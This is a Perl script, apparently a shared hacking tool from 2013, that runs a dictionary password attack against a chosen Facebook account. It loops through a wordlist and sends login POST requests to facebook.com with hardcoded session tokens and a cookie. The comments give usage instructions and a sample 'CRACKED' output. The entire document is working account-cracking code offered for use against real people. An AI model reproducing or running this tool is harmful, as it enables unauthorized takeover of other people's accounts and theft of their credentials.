Facebook Bruteforce

1. #!/usr/bin/perl
2. #
3. # Tool: Imad'Ox Bruter
4. # Author: Imad'Ox Hunter
5. # Contact: imadelouajib@gmail.com
6. # Code date: 17 April 2013
7. #
8. #
9. # Description:
10. # Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS.
11. #
12. # Usage:
13. # perl Imad'Ox-Bruter.pl login wordlist
14. # login could be either a user's email address or profile name
15. #
16. # Module Requirements:
17. #
18. # Install module if missing:
19. # perl -MCPAN -e 'install Net::SSLeay'
20. #
21. # Demo:
22. # perl Imad'Ox-Bruter.pl Facebooklogin@facebook.com wordlist.lst
23. #
24. # --- Imad'Ox-Bruter Facebook password cracking tool
25. # --- By Imad'Ox Hunter
26. # --- www.facebook.com/imad.elouajib
27. #
28. # [+] Cracking Facebooklogin@facebook.com ...
29. #
30. # [-] test -> Failed
31. # [-] test123 -> Failed
32. # [-] testtest -> Failed
33. # [-] testest123 -> Failed
34. # [-] qwerty -> Failed
35. # [-] azerty -> Failed
36. # [-] password -> Failed
37. # [-] password123 -> Failed
38. #
39. ########################################################
40. # [+] CRACKED! Your password is P@$$W0RD
41. ########################################################
42. #
43.  
44. use strict;
45. use Net::SSLeay::Handle;
46.  
47. if(!defined($ARGV[0] && $ARGV[1])) {
48.  
49. system('clear');
50. print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
51. print "+++ Coded by Imad'Ox-Hunter\n";
52. print "+++ www.fb.com/imad.elouajib\n\n";
53. print "+++ Usage: perl $0 login wordlist\n\n";
54. exit; }
55.  
56. my $user = $ARGV[0];
57. my $wordlist = $ARGV[1];
58.  
59. open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n";
60.  
61. print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
62. print "+++ Coded by Imad'Ox-Hunter\n";
63. print "+++ www.fb.com/imad.elouajib\n";
64. print "\n[+] Now Cracking $user ...\n\n";
65.  
66. while (my $password = <LIST>) {
67. chomp ($password);
68. $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;
69.  
70. my $a = "POST /login.php HTTP/1.1";
71. my $b = "Host: www.facebook.com";
72. my $c = "Connection: close";
73. my $e = "Cache-Control: max-age=0";
74. my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
75. my $g = "Origin: https://www.facebook.com";
76. my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
77. my $i = "Content-Type: application/x-www-form-urlencoded";
78. my $j = "Accept-Encoding: gzip,deflate,sdch";
79. my $k = "Accept-Language: en-US,en;q=0.8";
80. my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";
81.  
82. my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
83. my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
84. my $cl = length($post);
85. my $d = "Content-Length: $cl";
86.  
87.  
88. my ($host, $port) = ("www.facebook.com", 443);
89.  
90. tie(*SSL, "Net::SSLeay::Handle", $host, $port);
91.  
92.  
93. print SSL "$a\n";
94. print SSL "$b\n";
95. print SSL "$c\n";
96. print SSL "$d\n";
97. print SSL "$e\n";
98. print SSL "$f\n";
99. print SSL "$g\n";
100. print SSL "$h\n";
101. print SSL "$i\n";
102. print SSL "$j\n";
103. print SSL "$k\n";
104. print SSL "$l\n";
105. print SSL "$cookie\n\n";
106.  
107. print SSL "$post\n";
108.  
109. my $success;
110. while(my $result = <SSL>){
111. if($result =~ /Location(.*?)/){
112. $success = $1;
113. }
114. }
115. if (!defined $success)
116. {
117. print "[-] $password -> Not Him :( \n";
118. close SSL;
119. }
120. else
121. {
122. print "\n########################################################\n";
123. print "[+] Yuuup!! Pass Cracked => Pass is $password :D\n";
124. print "########################################################\n\n";
125. close SSL;
126. exit;
127. }
128. }